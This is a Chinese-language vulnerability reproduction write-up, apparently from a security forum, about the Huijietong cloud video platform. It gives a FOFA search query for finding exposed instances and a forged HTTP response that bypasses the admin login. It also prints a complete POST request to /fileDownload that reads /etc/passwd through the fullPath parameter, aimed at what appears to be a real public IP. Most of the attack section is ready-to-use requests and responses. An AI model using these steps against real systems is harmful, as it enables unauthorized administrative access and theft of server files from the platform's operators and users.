一、描述
会捷通云视讯平台存在登录绕过漏洞,可通过修改返回包绕过后台登录,还可进行任意操作删除,重启、升级、重置等等且存在任意文件读取漏洞。
二、影响范围
会捷通云视讯平台
三、漏洞复现
fofa搜索:body=“/him/api/rest/v1.0/node/role
1、登录绕过漏洞
对登录页面进行测试
输入任意密码进行登录:admin/123456,拦截数据包
正常返回包:提示密码错误
修改返回包,将返回包内容替换如下
HTTP/1.1 200
Server: Hsengine/1.4.1
Date: Fri, 09 Jul 2021 07:40:06 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Accept-Ranges: bytes
Vary: Accept-Charset, Accept-Encoding, Accept-Language, Accept
Content-Length: 61
{"token":null,"result":null}
放开拦截,可成功进入系统后台
2、未授权任意文件读取
通过访问漏洞url
/fileDownload?action=downloadBackupFile
对其进行抓包,如图下
再通过载体“fullPath=”即可进行任意文件读取,如图所示
POST /fileDownload HTTP/1.1
Host: 36.99.192.142:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: td_cookie=3499227148
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
action=downloadBackupFile&fullPath=/etc/passwd
请登录后查看回复内容